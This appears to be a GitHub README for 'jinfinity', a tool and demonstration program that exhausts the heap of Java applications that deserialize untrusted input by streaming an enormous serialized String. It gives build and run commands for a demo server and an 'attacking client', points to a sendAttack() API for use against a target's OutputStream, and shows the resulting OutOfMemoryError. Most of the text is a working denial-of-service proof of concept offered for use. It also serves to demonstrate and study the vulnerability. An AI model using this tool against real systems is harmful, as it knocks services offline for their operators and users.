An API and demonstration program for consuming all the memory of applications that deserialize data from untrusted sources (like HTTP requests) using the Java serialization specification.
Use the com.contrastsecurity.jinfinity.JInfinity.java#sendAttack() API to push an unreasonably large serialized String to a target OutputStream. You'll need to figure out how to get the OutputStream of your target set up correctly.
First, build the app:
git clone https://github.com/Contrast-Security-OSS/jinfinity.git
cd jinfinity
mvn clean package
To run the demo Jetty server, run this:
java -jar target/jinfinity-jar-with-dependencies.jar server
In another console, run the attacking client:
java -jar target/jinfinity-jar-with-dependencies.jar client
Within 30 seconds, the server will produce an OutOfMemoryError that looks something like this:
java.lang.OutOfMemoryError: Java heap space
at java.lang.AbstractStringBuilder.expandCapacity(AbstractStringBuilder.java:99)
at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:518)
at java.lang.StringBuffer.append(StringBuffer.java:307)
at java.io.ObjectInputStream$BlockDataInputStream.readUTFSpan(ObjectInputStream.java:3044)
at java.io.ObjectInputStream$BlockDataInputStream.readUTFBody(ObjectInputStream.java:2952)
at java.io.ObjectInputStream$BlockDataInputStream.readLongUTF(ObjectInputStream.java:2935)
at java.io.ObjectInputStream.readString(ObjectInputStream.java:1570)